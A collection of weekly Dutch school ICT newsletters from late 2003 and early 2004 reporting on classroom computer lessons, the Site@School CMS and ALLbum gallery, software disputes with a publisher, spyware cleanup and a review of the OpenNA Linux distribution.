praxis bulletin

Op de site opgenomen: praxisbulletin Boordevol Sinteklaas ideeën. Kijk dus snel.

vaardigheden groep 5

Groep 5 is bezig in een word document een gedicht te typen en daar wordt vanuit paint een illustratie bijgeplakt. Hopelijk zullen de producten zichtbaar gemaakt worden op de site bij groep 5. Ook is deze week gewerkt met de tekenwerkbalk.  Een paar weken geleden is begonnen met het bewerken van een eigen portretfoto in paint. Opeens hebben veel kinderen snorren, brillen en zwarte tanden.

Lessuggesties

Deze week kwam de aardrijkskunde nieuwsbrief van Thieme Meulenhoff (de wereld dichtbij) weer binnen. (aardrijkskunde nieuwsbrief) De opdracht die aansluit bij de lesstof van groep 5 is heel erg minimaal. Thema is “winkelen” geweest. En dan gaan ze een naar de kinderboekwinkel met slome opgaven over de kinderboekenweek, een memoryspel en een kleurplaat over een schildpad!!! Niet bepaald aardrijkskundig, al je bedenkt, dat de lessen zijn gegaan over “inrichten”. Kunnen de leerkrachten uit andere klassen kijken of de opdrachten daar wel relevant zijn?? Zoniet, dan wordt het tijd voor ACTIE!

Voor taalliefhebbers:

Het is mogelijk je te abonneren op een elektronische nieuwsbrief “taalpost”, een uitgave van het genootschap “onze taal”. Aanmelden: www.taalpost.nl Deze week werd erin vermeld, dat het eerste deel van de nieuwe uitgave van het Etymologisch Woordenboek deze week verschenen is  (A t/m E). Je kunt tot januari gratis online een kijkje nemen. Doen!!! http://www.etymologie.nl/ Lees bij het woord “computer” over de overeenkomst tussen computer en amputeren!!

Gratis internet door KPN van de baan.

bron: webwereld (www.webwereld.nl): Gratis internet voor scholen door rechter verboden Eerder werd geschreven dat de Opta het plan van KPN om scholen de komende drie jaar van gratis internet via Xs4all te voorzien geen probleem vond. De Haagse kortgedingrechter heeft echter wel bezwaren en heeft KPN verboden om een prijs te vragen aan scholen die lager is dan de kostprijs. Het aanbod zou KPN naar schatting 75 miljoen euro hebben gekost, een bedrag dat het bedrijf zag als een vorm van sponsoring. De aanspanners van het kort geding zoals UPC, Essent en Casema zagen het echter als een vorm van oneerlijke concurrentie en vroegen de rechter om een uitspraak.

Deel van de uitspraak is een boete van 200.000 euro per overtreding met een maximum van 30 miljoen euro. KPN gaat op zijn beurt in hoger beroep en belooft om met een ander aanbod te komen. Als KPN later het hoger beroep wint zal het ook de reeds gemaakte kosten aan scholen terugbetalen. WebWereld noemt het bijzonder dat er een verschil bestaat tussen de uitspraak van de Opta en de rechter. Wij willen er echter op wijzen dat de rol van de Opta het toetsen aan "regelgeving omtrent post en telecommunicatie" is terwijl de Nederlandse Mededingingsautoriteit

Stroomuitval door kleioven

We hadden weer eens donkere klassen en niet werkende computers. De bekabeling blijkt wat krap als de computers en de kleioven tegelijk aanstaan. Hopelijk heeft de elektricien de zaak nu onder controle.

Nu de technische zaken.

S@Salbum

Deze week hebben Martin en Karin keihard gewerkt aan het online fotoalbum, behorende bij ons S@S. Martin coden, Karin testen, mailen en Martin weer de code uitbreiden, verfijnen, gevonden bugs eruit halen. Vooral is er bij het ontwerp op gelet, dat er binnen het album gemakkelijk genavigeerd kan worden. D.w.z. er zijn verschillende albums, waartussen je gemakkelijk kunt switchen. Dat komt door de NAVIGATIE-LIJN (een lijst bovenin met links)

S@S agenda

Fred en Dirk doen de eerste voorzichtige stappen in het concreet denken over een S@S agenda. We hebben met Agnes gepraat, kregen hulp van een schoolhoofd uit Engeland. Peter F. kwam met een paar goede suggesties over de grondvesten van agenda's (agenda formaten). Fred kan het weer niet laten en heeft een mock-up in elkaar gezet die één functie laat zien van de kalender. Kijk op http://wyxs.net/agenda.html en beweeg je muis over de weekkalender. Deze oplossing bedacht Fred voor het ongenoegen dat Dirk zag bij bijna alle agenda's: je moet teveel 'klikken' voordat je ziet wat je wilt zien. Let op: dat je dit ziet, wil niet zeggen dat we deze kant opgaan. Het zijn experimenten. Opmerkingen, aanmerkingen, tips, suggesties en hulp zijn welkom.

S@S manual

Het manual voor versie 2 moet geschreven worden. Dat gebeurt op basis van vesie 1.2. Bij het schrijven valt op hoeveel er veranderd/verbeterd is. Dirk ervaart weer eens dat het schrijven van het manual de beste manier is om  S@S te leren kennen

Dat was het weer voor deze week. Goed weekend,
Karin,
Dirk

2003-11-21 w47

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie jaargang 3 - week 47 - 2003 (21 november)
Wat is er deze week op ICT gebied op de Rosa Boekdrukker gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Onderwijsinhoudelijk

ICT leerlijn

De activiteiten met de leerlingen hielden deze week in: werken met de tekenbalk van Word, plaatjes invoegen met tekstomloop, plakken, knippen en kopiëren, werken met paint. Vooral in groep 7 leerden de leerlingen erg snel. Het viel vooral op, dat ze elkaar veel uitlegden en veel zelf durfden uit te proberen.

Sinterklaas

De leerlingen hebben op internet gezocht naar leuke sites over Sinterklaas. Dit weekend worden de linken op onze website geplaatst. Klik op foto op voorpagina.

Letterpret

We hebben een brief opgesteld om aan Malmberg te sturen. In die brief verzoeken wij hen om ervoor te zorgen, dat wij met het programma kunnen werken. We willen niet de boel teruggeven en zonder programma komen te zitten.

Klankie

Wij overwegen om het toestenbord "klankie" aan te schaffen voor de oudste kleuters. (www.klankie.nl) Het is een toestenbord met klankondersteuning. We hopen dat we het een keer kunnen uitproberen op de onderwijsbegeleidingsdienst.

APS antivirus

Voor het antivirusprogramma van Norton, dat we besteld hebben bij de APS-IT diensten ontvingen we deze week een factuur, zonder dat het bestelde was binnengekomen. Na een telefoontje die kant op werd gezegd, dat ze nog wachten op een licentie certificering van Symantec (de maker van Norton). Dat is heel vervelend, want op een aantal computers loopt het abonnement van Norton af. Dan krijg je telkens bij het opstarten van een computer de melding, dat je moet updaten.

NL.Tree

Onze directeur ontving deze week een brief van NL.tree: "Geachte heer, Onlangs heeft u uw contract met ons opgezegd. Toch informeren wij u graag over ons nieuw gunstig geprijsde aanbod……." Het meest gunstig geprijsde aanbod is nog ruim € 20.- per maand duurder dan wat we nu hebben en voorlopig ook houden.

Verkeer

De leerkrachten van de groepen 6 t/m 8 hebben deze week uitleg en instructie gekregen om te leren omgaan met het verkeersprogramma "Tussen school en thuis". Wij zijn pilotschool voor het programma en gaan er zo snel mogelijk mee aan de slag.

Technisch

Site@School

We naderen de release datum van versie 2 en besloten er een Kerstcadeautje van te maken. De tijd tot Kerst zullen we nog hard nodig hebben. Er komen nog dagelijks grote verbeteringen van Fred. Zoals: In het intrAnet gedeelte kun je nu een heel andere vormgeving van de website maken. Dat is mooi! Zo kun je nooit in de war raken waar je bent (op het publieke deel of op het gesloten deel). De verbeteringen moeten getest worden en soms komen er dan nog bugjes boven (bedankt Matthijs!!). Verbeteringen leiden weer tot veranderingen in het manual dat Dirk bijhoudt, en zo blijven we  bezig. Het manual zal ook op tijd af zijn. De vertalingen voor versie 2 zijn op drie na binnen. We missen nog Spaans, Duits en Braziliaans. Het stageproject van Martin loopt op zijn eind. ALLbum is klaar om te testen door de liefhebbers. Je kunt 'm downloaden van http://sasmodulesi.sourceforge.net . Kijk onder: http://sasmodulesi.sourceforge.net/allbum/index.html ALLbum-0.0.12.tar.gz (Linux) ALLbum-0.0.12.zip (Windows) Wil je eventuele bugs aan Martin melden? Zie zijn e-mail adres op de sasmodules site.  We zijn benieuwd wat jullie van ALLbum vinden.

Agenda

Ondertussen gaat het coden en testen van de agenda door. Dirk heeft somslapeloze nachten  van het bedenken van wat de agenda wel en niet aan boord moet hebben. Fred wordt af en toe gek van 'm. Maar het schijnt dat wat ze maken de primus inter pares onder de schoolagenda's gaat worden. Zie de mock-up op http://wyxs.net/agenda/agenda.php Let op: niet alles werkt!

SNMP (Simple Net Management Protocol)

Zoals we al eerder schreven hebben we een Fenton UPS (vanwege goede support onder Linux). Op de UPS kon maar 1 server worden aangesloten. We hebben er twee en binnenkort 3, als we ESIS ook op Linux gaan draaien. Om meer servers op de UPS te kunnen aansluiten kochten we een SNMP kastje waarmee 't UPS al die server netjes kan uitzetten bij een stroomstoring. Prima kastje, en het werkt als een zonnetje.. Er kunnen wel 254 servers op…

Bijwerken image

We zijn ook bezig met verfijnen van het image dat we voor onze 40 computers hebben. Door wat maanden werken met de computers merken we dat een aantal zaken beter kunnen.

OpenNA Linux

Dirk bestelde bij http://www.openna.com een kant en klare,  op veiligeid gemaakte, Linux distributie. Deze is gemaakt op basis van zijn favoriete boek: "Securing and Optimizing RedHat LInux" (ook van OpenNA). Grote verrassing. Met deze CD heb je in een half uurtje een kant en klare veilige server. Gelukkig heeft Dirk nog het oude handwerk geleerd, maar dit cd'tje is ideaal voor scholen.  We houden je op de hoogte van de proefinstallaties.

groeten,
Karin
Dirk

2003-11-28 w48

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 48 - 2003 (28-11-2003)
Wat is er de ze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Als altijd, we beginnen met onderwijs info; onderin de technische info.

Onderwijsinhoudelijk

Nascholing Onderbouw

Afgelopen dinsdag hebben we met de kleuterbouw het programma Alles Telt beter bekeken samen met Monique van het ABC (onderwijsbegeleidingsdienst) Waarschijnlijk werd er voor het eerst tegelijkertijd met zes computers op het programma ingelogd. Het programma liep vast of ging erg traag. Dus wederom problemen met een netwerkversie. We hebben hulp van buitenaf ingeroepen. We wanhopen nog niet. Frustrerend was het wel. Zie ook onder 'Technisch'  Zie de foto's

Vaardigheden leerlingen

Het regelmatig werken achter de computer werpt zijn vruchten af in groep 5. Elke vrijdagochtend is een vast groepje kinderen bezig met een aantal opdrachten. Vandaag is het hen gelukt om een sinterklaasliedje van een internet site te kopiëren, dat te plakken in Word. Daarna zochten ze met Google een sinterklaasplaatje en plakten het in de tekst. Met de werkbalk 'figuur weergeven' werd het plaatje ook IN de tekst gezet. Daarna versierden ze het liedje met een in WORDART gemaakte titel.

Letterpret

Er is een brief opgesteld aan uitgeverij Malmberg m.b.t. Letterpret. Die wordt op dit moment door de juridische afdeling van ons Stadsdeel bekeken voor we hem versturen. We willen dat Malmberg een werkende Letterpret levert. Geld terug is geen optie.

Computermeubilair

We hebben nog steeds geen goede stoelen bij onze computerwerkbladen en computertafels. Omdat de tafels niet in hoogte verstelbaar zijn, moeten de stoelen verstelbaar zijn. Nu is het oog gevallen op een in hoogte verstelbare stoel met een voetenring. Zodat korte beentjes toch steun kunnen vinden, als ze niet bij de grond kunnen. Volgende week zullen we één stoel aanschaffen, als proef.

Microsoft Licenties

We hebben onze school weer aangemeld voor de Microsoft licenties van Windows en Microsoft Office. We hebben de computers (servers) waar Linux op draait natuurlijk niet meegeteld.

Foto album

Het door Martin gemaakte fotoalbum is afgelopen dinsdag aan de website van de Rosa Boekdrukker toegevoegd. Het is erg gemakkelijk om de foto's erop te zetten. Het is ook erg gemakkelijk om door het fotoalbum heen te zwerven door de navigatielijn bovenin. Dit programma wordt vast een klapper. Het is gratis te downloaden en zal in de toekomst ook openstaan voor verder ontwikkeling, zoals ons CMS. (http://sasmodulesi.sourceforge.net/allbum/index.html) Het zal nog wel even duren voordat alle foto´s zijn overgezet. Maar neem alvast een kijkje! http://rosaboekdrukker.net/index.php?section=15

Laatste nieuws:

Martin is nu begonnen aan de chat voor het basisonderwijs. Meer nieuws hierover volgende week.

Technisch

Zoals boven beschreven: Weer een netwerkprogramma dat niet goed werkt.  Dirk weet niet meer waar 't aan kan liggen: Zijn gebrekkige Linux/Samba,   Windows, netwerken kennis? De combi Samba met Windows programma's? Slecht geprogrammeerde netwerksoftware?  De combinatie van alle drie? Eén ding weten we zeker. Hier moet een eind aan komen! Dit soort gedoe vermindert het ICT enthousiasme van de leerkrachten. Als 't aan Linxu/Samba ligt, dan moet er maar een Windows server komen voor de programma's die netwerkfunctionaliteit nodig hebben. Maar, aan de andere kant moet gezegd worden: De programma's van Zwijsen (Leesladder) en Ambrasoft (TafelTotaal) en 'Ik-Reken', doen het goed. We hebben hulp gezocht en houden jullie op de hoogte.

UPS en SNMP (Uninterrupted Power Supply en Simple Network Management Protocol).

Jullie hebben nog wat prijzen tegoed die we vorige week nog niet hadden. Fenton UPS'en kosten, afhankelijk van de capaciteit ongeveer tussen de. EUR 60 (180 watt) en EUR 260 (rack mount, 950 watt). Hou rekening met vervoerskosten (die dingen zijn zwaar vanwege de accu's). Het SNMP kastje met software kost  EUR 275. Reden van tevredenheid: Goede manuals en Dirk kon 't simpel aan de praat krijgen.

S@S versie 2 nieuws

De beta versie's volgen elkaar rap op. Fred haalt de (hopelijk) laatste bugs eruit en Dirk installeert 't telkens from scratch om de zekerheid te hebben dat er geen extra fouten of problemen ontstaan. Het manual van versie 2 vordert en de vertalingen stromen binnen. Alles loop nog op schema. Hilde Niezen stuurde ons een sitemap module die ze gemaakt had. Hebben we meteen opgenomen in versie 2. Zeer bedankt Hilde.

groeten,
Karin
Dirk

2003-12-05 w49

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 49 - 2003
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

De goedheiligman is nog in 't land,
vandaar de nieuwsbrief in deze trant.

ICTleerlijn

Een inhaalslag moet nog in groep acht,
zodat een werkstuk wordt volbracht.
Met heel veel oefening in wurd
zijn alle leerlingen in een spurt.
Met Google zoekt kind Sintplaatje
en plakt het in een klazen-lied.
Met tekstomloop in gaatje,
en "Klaar is Kees", zegt Piet.

Monique kwam kijken in groep 4,
en zag daar veel computers staan.
Ze vroeg meteen hoe gaat het hier?
Dat wordt een goeie klas voortaan.
Ze tekenen Paint en schrijven ook.
Geloof ons maar, ´t is geen joke.

Virus

De anti-virus software is verlopen.
We moeten dringend 'n nieuwe kopen.
Het APS verzaakt haar plichten
en geeft ons almaar geen berichten.
De licenties zijn nog niet gereed.
De virussen zeggen: "Wij hebben beet".

Rectificatie

De BIC wordt naar waarheid gemaakt,
maar werd onlangs toch afgekraakt.
De tekst was haastig opgesteld.
Een naam werd daardoor faud vermeld.
Niet Hilde had de sitemap voor S@S gecood,
maar Fred had haar idee in PHP ontbloot.
Sorry Fred en geëerd lees-publiek.
Het ontbreekt ons iets aan zelfkritiek

Site@School

Het werk aan S@S V2 en manual
vordert gestaag maar dat wistual.
De deadlines kruipen naderbij,
en nog is de software niet bugsvrij.
Sint pikt de smoesjes zeker niet
die hij hoorde van de manualpiet.
Want de code Piet kondigde het al aan
hij is in woord en daad niet mis te verstaan:
S@S  V2 wordt ons kerstkado aan allen,
we hopen dat u zal bevallen.

ALLbumbug

Een vileine bug in Amsterdam West
had een foutloze loop van ons ALLbum verpest
Onze goede stagiair Martin Hermann,
die van coden ondertussen heel wat kan,
en inmiddels zijn laatste week bij ons is,
(wij wenen reeds bij de gedachte aan 't gemis)
heeft de bug om zeep gebracht.
ALLbum draait weer in grote pracht.

ETTERPRUT

Groot de opluchting op de OBSRB.
De afeling ICT is weer enigszins tevree.
SchoolLAN gaat spitten in Letterpret's falen.
Dirk hoeft even niet meer te malen:
Is de combi Linux/Samba te krap?
Of de schuld van z'n tovenaarsleerlingschap?
Peter's kennis van databases, windozen en lockfiles,
Zal uiteindelijk resulteren in big smiles.
Zijn onderzoek komt ten goede aan allen.
En hoe 't ook gaat, het zal ons en u bevallen!

Goed weekend gewenst en tot de volgende keer.
In de 51 komende BIC's rijmen we niet meer.
Karin,
Dirk

2003-12-12 w50

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 50 (12-12-2003)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

geintje

Letterpret van Malmberg

Wij zijn aan het onderzoeken hoe we Malmberg onder druk kunnen zetten om het programma Letterpret in ons netwerk goed werkend te krijgen. “Niet goed  geld terug” is voor ons geen optie, omdat het programma in ons taalbeleid past en we er scholing voor gehad hebben en er veel tijd in is gestoken. We hebben een brief opgesteld, die door de juridische afdeling van ons schoolbestuur is bekeken. Ook de consumentenbond heeft ons op een aantal zaken gewezen. Het jaar 2004 zal een zwaar jaar worden voor uitgeverij Malmberg.

Inhaalslag van groep 8.

In groep 8 zitten kinderen die duidelijk minder computerervaring hebben dan leerlingen in groep 4 en 5. In alle groepen wordt een aantal identieke oefeningen gedaan en duidelijk is te zien, dan regelmatig achter de computer werken in groep 5 al zijn vruchten heeft afgeworpen.

Sint fotoos

Het wordt steeds gemakkelijker om foto´s op de site te zetten. Kijk hier.

Spyware

Nieuw fenomeen. Iemand heeft iets zitten doen op een computer op de administratie waardoor er steeds een site met allerlei rare links tevoorschijn komt: Sex en casino. Het is de startpagina geworden, compleet met pop-ups hoe je je overgewicht kwijt moet raken. Niet uit te roeien. Dus het programma Ad-aware van lavasoft geïnstalleerd. Maar ook dat heeft nog niet geholpen. (www.lavasoftusa.com) . Lees erover in: http://www.planet.nl/planet/show/id=74274/contentid=396682/sc=3adf26 Veel over spyware: hoe kom je er aan? Hoe voorkom je het? Hoe kom je er af.

Stage Martin

Afgelopen Dinsdag eindigde Martin Herrman's  3 maanden durende stage vanuit de Technische Universiteit Eindhoven op de OBSRB. In die tijd ontwikkelde hij 'ALLbum', een 'Picture Gallery' voor S@S. We zijn er zeer gelukkig mee en horen ook van andere scholen dat ALLbum bevalt. Het ALL in allbum betekent dat het programma plaatjes kan laten zien, maar ook geluid kan laten horen en andere bestanden kan bevatten om te laten zien/horen. De stage is alle partijen (OBSRB, Martin, TU/e) goed bevallen. Martin kreeg een 8.  Voor de toekomst kunnen we projecten indienen die door studenten (als ze er zin in hebben) uitgevoerd kunnen worden. Dank voor je bijdragen aan het onderwijs wereldwijd Martin!

Flitsbezoek ambtenaren OC&W

Ongeveer 2 minuten hadden de ambtenaren de tijd om de uileg over S@S aan te horen. Gelukkig waren ze net in het nieuws geweest, anders hadden we ze voor vluchtelingen aangezien.

EFA

In januari gaat Karin voor de EFA (educatieve faculteit Amsterdam) een voordracht houden over onze ICT leerlijn. Ze hoopt hiermee docenten van de opleiding te motiveren om aandacht te besteden aan de integratie van ICT in de dagelijkse gang van zaken in een school. ICT is niet een apart vak op de basisschool, maar moet gezien worden als een hulpmiddel. Dus het is van belang, dat tijdens de opleiding van nieuwe studenten geleerd wordt hoe het onderwijs ingericht moet worden met het geïntegreerd gebruik van computers, netwerken en het Internet.

Barry Faas en Edukitty

We kregen bezoek van Barry Faas, 15 jarige scholier, winnaar van de Linux programmeerwedstrijd 2003. Hij demonstreerde ons zijn 'Edukitty' een framework en desktop voor educatieve toepassingen. Daarbij een inleiding die ons duizelde: service layer, sessie beheer, i18n Plugin, ENetConfig & Socket Layer etc.etc. Het is een server-client systeem. Voor de guru's hebben we de tekening  hier.

Het framework is geprogrammeerd in C++ en gebruikt QT http://www.trolltech.com voor cross-platform compatibiliteit. Wat dus in 'Edukitty' aan educatieve software wordt ontwikkeld is zowel onder Windows als Linux als de Mac te gebruiken. Dat maakt 't wel heel interessant!  Alles is ontwikkeld voor gebruik in netwerken. Er kunnen dus zonder problemen veel computers aan hetzelfde bezig zijn.

Toen kregen we een demonstratie. We vonden de  'Edukitty'  desktop er zeer goed uitzien. Barry had het grafisch werk zelf verzorgd: schitterend mooi! Over een half jaar is 'Edukitty' klaar en kunnen er toepassingen voor ontwikkeld worden. Door het onderliggende framework is het ontwikkelen van toepassingen relatief makkelijk. Wij waren zeer onder de indruk van Barry's werk en willen hem graag met raad en daad terzijde staan. Als we hadden geweten wat we te zien zouden krijgen (met name de complexiteit) hadden we jullie allemaal uitgenodigd. Reken maar vast op de uitnodiging, over een half jaar.

S@S

Dirk legt de laatste hand aan het manual: het schrijven van het hoofdstuk over de up/download module. Het manual is nu al te bekijken op http://wyxs.net/man2 .  Kijk vooral eens in de intro, waarin de features staan. Fred poetst aan het (laatste?) vuiltje dat hij onderlaatst ontdekte. Kortom, we liggen op schema. Een paar weken geleden al besloten we geen nieuwe code meer in versie 2 te verwerken, om genoeg tijd te hebben voor eventuele bugs en de vertalers. Ook de laatsten lopen op schema (alles binnen behalve 't Forum in het Japans).

groeten,
Karin
Dirk

2003-12-19 w51

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 51 (17-12-2003)
Wat is er de ze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Een drukke feestweek, dus weinig te biccen.

Letterpret van Malmberg.

Na consult met juridische afdeling van het stadsdeel is de brief aan Malmberg verstuurd. Ze hebben tot eind januari de tijd om 't probleem op te lossen. We houden je op de hoogte.

ICT leerlijn.

Deze week waren er weer twee klassenconsulten van onze onderwijs begeleidingsdienst. Deze keer was het bij de groepen 6 en 3. Meteen na de vakantie gaan we weer nieuw opdrachten opstellen voor alle groepen.

Normal.dot problemen en oplossing

Normal.dot is het Word bestand waarin gedefinieerd wordt hoe je pagina eruit ziet als Word opstart. Hebben we voor de ll. ingesteld op lettertype Arial en een puntgrootte van 14. Tot zover is er niks mis. Maar als ll. wat anders willen, en iets veranderen, zeurt Word over een verdwenen of beschadigd normal.dot bestand. Word wil dan niet goed afsluiten. Oplossing: maak normal dot een 'alleen lezen' bestand. Dat doe je zo: Zorg dat Word niet in gebruik is. Zoek het bestand op met de Windows verkenner. Het bestand normal.dot staat meestal in C:\program files\microsoft office\sjablonen Rechts klik en zoek 'Eigenschappen', zet een vinkje bij 'alleen lezen'. Druk op 'OK'. Als je een normal.dot bestand wilt aanpassen voor leerlingen, dan moet je dat doen voordat je 't bestand op 'alleen lezen' zet.

Spyware

Vorige week hadden we 't over Spyware. Hier is nog een prima programma: Spybot: http://www.safer-networking.org/ . Uit de (fractie aangepaste, BIC)   blurb: the best (according to PC World, PC Mag, C't) privacy software available!

Stage Martin

Wel afgelopen, maar Karin vond nog een bug. Die werd snel verholpen. Bedankt Martin!

S@S

Het manual is klaar (en goedgekeurd door ons SAS opperhoofd Fred). Zie vooral de complete lijst met  features op http://wyxs.net/man2/intro.htm#features. Je vindt er een _compleet_ CMS! De release datum hebben we vastgesteld op 29 december. Voor onze collega's in Japan: alle vertalingen zijn klaar.

groeten, Karin
Dirk

PS misschien komt er nog een bic dit jaar…

foto watermerk

Groep 8 is aan het werk. Hier wordt een watermerk gemaakt.

2003-12-26 w52

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 52 (28-12-2003)
Wat is er de ze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Deze BIC is voor de technici onder de biccers.

We (Peter Fokker en Dirk) hebben een middag besteed aan de nieuwe Linux distributie van OpenNA. Zie http://www.openna.com. Zij hebben een distro voor (en we quoten de blurb):

"OpenNA Linux is a GPL Licensed Linux operating system for 686 compatible architectures with full, professional quality Unix OS with rock-solid stability and industrial-strength networking. Highly secure, very fast, and modern Linux operating system, it is intended for those who want to install and run a Linux server for mission critical tasks in a high secure environment."

We kennen OpenNA al van hun voortreffelijke boeken: "Securing and Optimizing Red Hat Linux" van Gerhard Mourani, de baas van OpenNA. Daarin staat in detail beschreven hoe je je systeem minimaal installeert, beveiligt, er vervolgens de services op zet die je nodig hebt en die vervolgens weer beveiligt. Dat klusje goed doen is een nauwkeurig werkje dat een hoop tijd kost. Je kunt je dus voorstellen dat wij nieuwsgierig waren naar een GPL distro die je voor $ 47,-- (met installatiehandleiding in de vorm van een boekje) kunt kopen. Je mag 'm ook downloaden en zelf branden, maar wij steunen dit initiatief graag, ook financieel.

Zo togen wij dus aan den arbeid. De CD heeft een prima TUI (text user interface). Je kiest voor een server-, werkstation-, of desktop installatie. Wij hebben alleen de serverkant bekeken. Je kunt je afvragen of de werkstation en desktop installatie wel thuishoren op zo'n CD. Wij vinden van niet.

Je kunt uit verschillende installaties en servertypen kiezen. MIN (minimal compiler package installation), HTTP, FTP, DNS, SMTP, DB, GTW (gateway) en een VRT (virtual server). Daarna krijg je verschillende opties voor extra pakketten voorgeschoteld. Dat systeem is niet erg duidelijk. In alle gevallen kun je kiezen voor wel/niet installatie van de firewall en laptop functionaliteit. Het laatste verklaart OpenNA vanuit het leger, waar laptops veel als servers gebruikt worden.

Wij slaagden er niet in om een gateway server met web, mail, mysql en php te krijgen, geconfigureerd vanuit het menu. Het configureren van een tweede netwerkkaart (toch onmisbaar in een gateway) mag je zelf doen als de installatie voltooid is. Een ingestoken netwerkkaart wordt niet herkend. Maar, laat je hier niet door afschrikken. We slaagden er wel in om in no time een server met mail, mysql, http, php en webmail werkend te krijgen. Dat hadden we nog niet eerder meegemaakt.

De mailserver (Exim) komt meteen met webmail (Squirrelmail), met ClamAV, spam assassin, SSH, logcheck, portsentry en sxid.  In de installatiehandleiding staat prima beschreven wat je nog moet doen na installatie om mysql en squirrelmail aan de praat te krijgen. We zetten er ook nog even de laatste versie van Site@School op. Hij werkte vlekkeloos.

Partitioneren kan automatisch met HD's groter dan 5,5 G. Met kleinere HD's moet je manueel partitioneren met cfdisk.

Peter heeft nog een handig overzicht in HTML gemaakt met alle RPM's. Daar kun je ook zien welk servertype welke pakketten gebruikt.  Zie: http://wyxs.net/07-07.html Hierin zie je de namen van van alle .RPM's op een rijtje per 'server'. Daarbij zijn de servers 08 en 09 weggelaten, want dat zijn eigenlijk geen servers, maar werkstations. Voor elke server is beschreven wat er in het 'base' pakket zit, en bovendien wat er aan aanvullende mogelijkheden geboden wordt. Neem bijv. de mailserver '04 SMTP' die we bekeken hebben.

Daarin zitten zo'n 90 standaard .RPM's in. Daarnaast kun je kiezen uit:

- webmail ja/nee,
- mysql-server ja/nee,
- laptop ja/nee,
- firewall ja/nee.

Simpel. Als je dan kijkt wat je nog mist t.o.v. "alles", dan is dat eigenlijk niets anders dan

- een ftp-server (zoals bij 01 HTTP)
- een name-server (zoals onderdeel bij 03 DNS)
- odbc-faciliteit (zoals bij 05 DB)
- een dhcp-server (zoals bij 06 GTW)
- een proxy-server (zoals bij 06 GTW)
- intrusion detection (zoals bij 06 GTW)

Daarvan vind ik persoonlijk  (Peter) de ftp-server en de odbc-faciliteit behoren tot 'nice to have' en niet zozeer tot de basis van een server. De rest vind ik wel handig. (O ja, in 02 FTP zit ook nog rsync en thttpd, dat lijkt me helemaal overbodig, vandaar dat ik het niet noem).

Bij 07 VRT zit bijna alles erin (in ieder geval zijn de opties van 04 SMTP standaard bij 07 VRT).

Een mooie, complete server zou dus zijn:

- 07 VRT
- plus mysql (standaard-optie)
- plus laptop (standaard-optie)
- plus firewall (standaard-optie)
- plus webmail (standaard-optie)
- plus bind (1 x rpm)
- plus dhcpd (1 x rpm)
- plus squid (1 x rpm)
- plus ids (11 x rpm)

Daar kun je dan nog een paar dingetjes aan toevoegen, zoals bijv. S@S. Je bent dan een aardig end op weg naar de ultieme server, dacht en we zo.

De eerste indruk van deze distro is positief. Wat we missen is de gateway met servers in 1 computer. Maar uit de boeken va Mourani hadden we al de indruk dat dit tegen het veiligheidsconcept van de auteur is. Dat is jammer, want veel scholen werken wel zo. We gaan ermee verder.

Tot zover de vakantiebic. Voorspoedig 2004,
Peter Fokker
Dirk

2004-01-09 w02

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 2- 2004 (9 jan)
Wat is er de ze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ROKEN en ICT

De OBSRB is rookvrij. Het bevoegd gezag heeft met voortvarende hand het alternatief ontwikkeld: de 'rookkooi'. Via het lokaal van Marianne kun je de rookkooi betreden en, veilig achter tralies beschermd voor anti-rookgedrag van de straat, onder een afdak, een sigaret/sigaar roken. De afd. ICT (de rokers en de niet rokers aldaar) steunt dit initiatief van harte en stelt uit het budget een asbak ter beschikking. Volgende week wordt hij geleverd. Wij kijken nog uit naar een rooktafel en -stoel.

onderwijs

ICT leerlijn

Er wordt flink gewerkt aan de werkstukken in groep 8. Jammer genoeg zit er nog te veel kopieer en plakwerk in.
Deze week zouden we een nieuwe reeks opdrachten maken voor de ICT leerlijn, maar door ziekte is dat opgeschoven. Gelukkig zijn er hier en daar nog wat opdrachten blijven liggen. In groep 8 is al een aantal kinderen dat een prachtige bladzij kan maken met een watermerk.
Groep 4 is aan een nieuwe paint opdracht begonnen en ook heeft zich een aantal leerlingen aan het type programma gewaagd. (zie foto)
Groep 7 heeft via het boek Digiwijs een nieuwe opdracht met kaders gedaan. Helemaal uit eigen initiatief. Groep 6 werkt aan een nieuw werkstuk. In groep 5 is een begin gemaakt met het schrijven van een korte weettekst (taallijn). Die is daarna op de computer getikt. Volgende week wordt er een plaatje van een eekhoorn ingevoegd. (integratie ict in het gewone curriculum).
Het verschil tussen opslaan en openen blijft problematisch. Regelmatig gaat er nog een product verloren door deze misvatting. Waarom heet opslaan niet gewoon BEWAREN??

Leerlingpagina's

Alle leerlingen kunnen een paar pagina´s op het Internet krijgen die ze van thuis uit beheren. Sinds deze week worden er waarschuwingen gestuurd naar de klassenleerkrachten, als er iets wordt gewijzigd op de pagina zodat zij, waar nodig, actief kunnen ingrijpen. We moeten namelijk wel controleren of ze er fatsoenlijke dingen op zetten.
Karin houdt via de chat contact met leerlingen die thuis vragen hebben over het gebruik van de eigen homepage.

Computer in de voorschool

Onze voorschool, de Pioenroos, heeft nu ook een computer van ons gemeentelijk toeleveranciersbedrijf. Ze zijn op internet aangesloten, hebben een eigen email adres, kunnen printen en hebben een map op de bestandenserver. Veel plezier pioenroosjes!

Kleutertoetsenbord

